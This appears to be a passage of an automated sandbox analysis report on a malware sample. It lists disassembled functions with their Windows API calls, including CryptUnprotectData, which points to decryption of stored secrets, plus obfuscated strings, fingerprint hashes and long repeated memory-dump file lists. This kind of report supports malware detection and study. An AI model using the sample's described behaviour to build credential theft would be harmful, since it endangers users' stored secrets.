                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 28782000c955892bf6cae6a2a13f734c4fb86f7b166ca9d1d1c436a700a90a5e
                          • Instruction ID: 95de1232023111142a99b249e16509b9fce0f1d2a6f817128bc6c96078243a7c
                          • Opcode Fuzzy Hash: 28782000c955892bf6cae6a2a13f734c4fb86f7b166ca9d1d1c436a700a90a5e
                          • Instruction Fuzzy Hash: 26111C70600208BFDF01CF64E884FA737A9AF8A304F109448F9158B250DB35EC41DB60
                          Function 00397A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E3E1B8,00000000,?,003A0E10,00000000,?,00000000,00000000), ref: 00397A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00397A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E3E1B8,00000000,?,003A0E10,00000000,?,00000000,00000000,?), ref: 00397A7D
                          • wsprintfA.USER32 ref: 00397AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: 89501a6fe3dcf545b4c65dae5128088ead61aceac9a78bd9397fd9336add23bd
                          • Instruction ID: 24ebf55b201d9c54e250cf6f79f54dca383ea3183c293e86d384924b73eb982f
                          • Opcode Fuzzy Hash: 89501a6fe3dcf545b4c65dae5128088ead61aceac9a78bd9397fd9336add23bd
                          • Instruction Fuzzy Hash: EF118EB1D45618EFEB208B54DC49FA9BB78FB04721F10439AE91A932C0C7745E44CF51
                          Function 00741EC7 Relevance: 5.4, Strings: 3, Instructions: 1679COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &9Vg$JN}$`mE
                          • API String ID: 0-369595573
                          • Opcode ID: 4556edee443867132f72691a74c141043b8330dbf8c4a7389d56e03b822164a6
                          • Instruction ID: 35d089e82b673bc10a14fb0aca3e1701260271972364b590f345ab5b6b295bca
                          • Opcode Fuzzy Hash: 4556edee443867132f72691a74c141043b8330dbf8c4a7389d56e03b822164a6
                          • Instruction Fuzzy Hash: DDB238F360C204AFE7086E2DEC8567AFBE9EBD8320F16493DE6C5C3744EA3558058656
                          Function 00393720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(0039E118,00000000,00000001,0039E108,00000000), ref: 00393758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003937B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: d4348127cc47563869fe6cf71ad2f40016a7bd3c94fb5c082f79461778444da6
                          • Instruction ID: e9723b560ee478019b359f7695e6412e3af28f0376ee3451d56600f8b2bc00e5
                          • Opcode Fuzzy Hash: d4348127cc47563869fe6cf71ad2f40016a7bd3c94fb5c082f79461778444da6
                          • Instruction Fuzzy Hash: E541E770A40A28AFDB24DB58CC95F9BB7B5BB48702F5041D8E609EB290D7716E85CF50
                          Function 00389B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00389B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00389BA3
                          • LocalFree.KERNEL32(?), ref: 00389BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: e7df42d24df433a9ab79aa4e5b1a521a408c6863c685ef196eef5534abe3e1e5
                          • Instruction ID: febfa887247d766ec64c582be152a55bdfbe5f27ae0eec13de39231accb3b954
                          • Opcode Fuzzy Hash: e7df42d24df433a9ab79aa4e5b1a521a408c6863c685ef196eef5534abe3e1e5
                          • Instruction Fuzzy Hash: EB11FAB4A00209DFDB05DFA4D985EAE77B5FF88304F104599E81597350D774AE14CFA1
                          Function 0063FFA5 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +h`%
                          • API String ID: 0-1045090907
                          • Opcode ID: cd94008da60ee404929040c323441149d7174d1709696b02f0453d8905eb4bca
                          • Instruction ID: 9b55dbab138e7b67b5a9a0e4144f88f5e1b5e8292ad3d5b265f497c71b075a06
                          • Opcode Fuzzy Hash: cd94008da60ee404929040c323441149d7174d1709696b02f0453d8905eb4bca
                          • Instruction Fuzzy Hash: ED5104B39086189FE3057E29EC8576ABBE5EF94310F06493DDAC4C7340EA769844C7D6
                          Function 0067AF0B Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: rU{
                          • API String ID: 0-2083634413
                          • Opcode ID: 4069d75e7cb5dfaa9f20a79b276fb4fc0b4489413e45f802164e24f51c9f7366
                          • Instruction ID: ba621a14214173b0baf1225d6e7b82216f722f0f1df0226731882d5f7a8767b3
                          • Opcode Fuzzy Hash: 4069d75e7cb5dfaa9f20a79b276fb4fc0b4489413e45f802164e24f51c9f7366
                          • Instruction Fuzzy Hash: B751E5F36082049FE3186E58EC9677AF7DAEF98720F1A443DE7C5C7780E97568008696
                          Function 0067C9BC Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: {|+<
                          • API String ID: 0-2576279643
                          • Opcode ID: bc3136f7a72e00d433deab4bdfc17cb2e08b2e82cc9a19ad21b0df7404a0940c
                          • Instruction ID: 0042ce8d170d9a45a702f8fc49c0502d884ac8f530c91e906c10a3bc9d2345a3
                          • Opcode Fuzzy Hash: bc3136f7a72e00d433deab4bdfc17cb2e08b2e82cc9a19ad21b0df7404a0940c
                          • Instruction Fuzzy Hash: 0C4127F3E052245FE350696DDC847A7B6CADBD4730F2B4639DA88E7780E8399C0642D6
                          Function 0082E54B Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %7
                          • API String ID: 0-2914357168
                          • Opcode ID: 3e7a32ec2fc7ed5e6df6d5b6c3f974b7620be93d49cba828187f946697947d7b
                          • Instruction ID: 434fddeb735c8aeda9558fa4fc350dfc3a40d5f1f3a0dbc317e19680ba9badc9
                          • Opcode Fuzzy Hash: 3e7a32ec2fc7ed5e6df6d5b6c3f974b7620be93d49cba828187f946697947d7b
                          • Instruction Fuzzy Hash: 6A51C3F291C618DFD3056E29E94527AB7E5FBA8304F26482DD5C6D7600F631A880DB8B
                          Function 006F4D7C Relevance: .2, Instructions: 174COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f5ce4b18a5989bb550eb4944369bc6570416259208a9c836d040e20fc5f37a98
                          • Instruction ID: e078a85c224aa0b000d68ec933bc6275daf76b428959925706a928775c4c27a0
                          • Opcode Fuzzy Hash: f5ce4b18a5989bb550eb4944369bc6570416259208a9c836d040e20fc5f37a98
                          • Instruction Fuzzy Hash: 295181B36182009FE3086E69DC55B7EF7E9EF98320F1B092EE6C5C3740EA7558418656
                          Function 0069FE5B Relevance: .1, Instructions: 137COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a558f2ef2a4e86a352ff5fd02b2452e08d1ddc6cefbe0c3119e5024ebfb90a05
                          • Instruction ID: b3983dec022655d70a965522a51d680e2cdb6d50ad9b06357fc2307343add99b
                          • Opcode Fuzzy Hash: a558f2ef2a4e86a352ff5fd02b2452e08d1ddc6cefbe0c3119e5024ebfb90a05
                          • Instruction Fuzzy Hash: 9A41E1F3A082044BF3586E28EC8673AB7D2EBD8310F1B863DDBC5876C4D93958558646
                          Function 008138FB Relevance: .1, Instructions: 99COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2d76d7a3c6ed611e8f9e7f35074a357369e499c8d9f1f347aba3931a0cc207d
                          • Instruction ID: 28385804a2d8546d40bee456a2635aa1592172e9ecd185dedf09215dcbd12dd8
                          • Opcode Fuzzy Hash: f2d76d7a3c6ed611e8f9e7f35074a357369e499c8d9f1f347aba3931a0cc207d
                          • Instruction Fuzzy Hash: 19310FB241C7089BE315BF28D88666AFBF0FF18710F06082DE6D582610E7395594CB97
                          Function 007C3892 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
